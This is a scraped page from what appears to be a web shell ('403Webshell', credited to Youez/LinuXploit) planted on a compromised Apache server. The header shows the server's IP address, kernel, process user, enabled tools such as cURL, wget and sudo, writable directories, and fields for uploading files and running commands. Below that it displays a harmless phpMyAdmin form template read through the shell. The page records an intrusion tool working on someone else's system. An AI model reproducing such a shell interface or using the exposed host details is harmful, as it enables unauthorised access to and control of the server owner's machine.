403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.14
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/phpmyadmin/templates/table/insert/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/phpmyadmin/templates/table/insert/continue_insertion_form.twig
<form id="continueForm" method="post" action="{{ url('/table/replace') }}" name="continueForm">
    {{ get_hidden_inputs(db, table) }}
    <input type="hidden" name="goto" value="{{ goto }}">
    <input type="hidden" name="err_url" value="{{ err_url }}">
    <input type="hidden" name="sql_query" value="{{ sql_query }}">

    {% if has_where_clause %}
        {% for key_id, where_clause in where_clause_array %}
            <input type="hidden" name="where_clause[{{ key_id }}]" value="
                {{- where_clause|trim }}">
        {% endfor %}
    {% endif %}

    {% set insert_rows %}
        <input type="number" name="insert_rows" id="insert_rows" value="
            {{- insert_rows_default }}" min="1">
    {% endset %}
    {{ 'Continue insertion with %s rows'|trans|format(insert_rows)|raw }}
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit